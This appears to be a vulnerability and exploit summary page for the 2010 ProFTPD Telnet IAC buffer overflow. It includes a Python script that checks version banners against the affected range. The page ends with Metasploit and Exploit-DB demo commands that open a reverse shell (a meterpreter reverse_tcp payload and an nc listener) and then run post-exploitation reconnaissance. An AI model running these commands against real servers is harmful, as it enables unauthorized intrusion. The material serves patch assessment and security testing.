Timeline :
Vulnerability reported to vendor by ZDI on 2010-09-24
Coordinated public release of advisory on 2010-11-02
Metasploit exploit released on 2010-11-05
Exploit-DB exploit released on 2010-11-07
PoC provided by :
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit
Reference(s) :
Affected version(s) :
ProFTPD versions between 1.3.2rc3 and 1.3.3b
Tested on Debian Squeeze with :
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
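A way to check a server banner or a package file name against the affected range above (added example, not code from the original page or from the ProFTPD project). It assumes the bounds are inclusive and that ProFTPD versions order as rcN < release < letter suffix; the function names and the sample banners are constructed for illustration.

```python
import re

# Range from the page's "Affected version(s)" line; inclusive bounds are an assumption.
AFFECTED_MIN, AFFECTED_MAX = "1.3.2rc3", "1.3.3b"

_VERSION = r"\d+\.\d+\.\d+(?:rc\d+|[a-z])?"
_PARTS = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?")
# Version as it appears after the product name in a banner or package file name.
_IN_TEXT = re.compile(r"(?i:proftpd)\S*?[ _](" + _VERSION + r")(?![\w.])")


def version_key(version):
    """Sortable key: within one x.y.z, rc1 < rc2 < release < a < b < ..."""
    m = _PARTS.fullmatch(version)
    if m is None:
        raise ValueError(f"unrecognised ProFTPD version: {version!r}")
    base = tuple(int(g) for g in m.group(1, 2, 3))
    if m.group(4):                      # release candidate: before the release
        return base + (0, int(m.group(4)))
    if m.group(5):                      # maintenance letter: after the release
        return base + (2, ord(m.group(5)) - ord("a") + 1)
    return base + (1, 0)                # plain release


def extract_version(text):
    """Return the upstream version found in text, or None."""
    m = _IN_TEXT.search(text)
    return m.group(1) if m else None


def is_affected(text):
    """True/False for a recognised version, None when no version is found."""
    version = extract_version(text)
    if version is None:
        return None
    return version_key(AFFECTED_MIN) <= version_key(version) <= version_key(AFFECTED_MAX)


if __name__ == "__main__":
    # Constructed inputs, except the package name, which is the one the page tested.
    samples = [
        "proftpd-basic_1.3.3a-4_i386.deb",
        "220 ProFTPD 1.3.2rc2 Server (constructed banner) [192.0.2.10]",
        "220 ProFTPD 1.3.3c Server (constructed banner) [192.0.2.10]",
        "220 FTP server ready",
    ]
    for s in samples:
        print(f"{is_affected(s)!s:5}  {s}")
```

A `None` result means the banner does not disclose a version, so the installed package version has to be checked on the host instead.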
Description :
This module exploits a stack-based buffer overflow in ProFTPD server versions between 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
Metasploit Demo :
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
ipconfig
Exploit-DB demo :
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig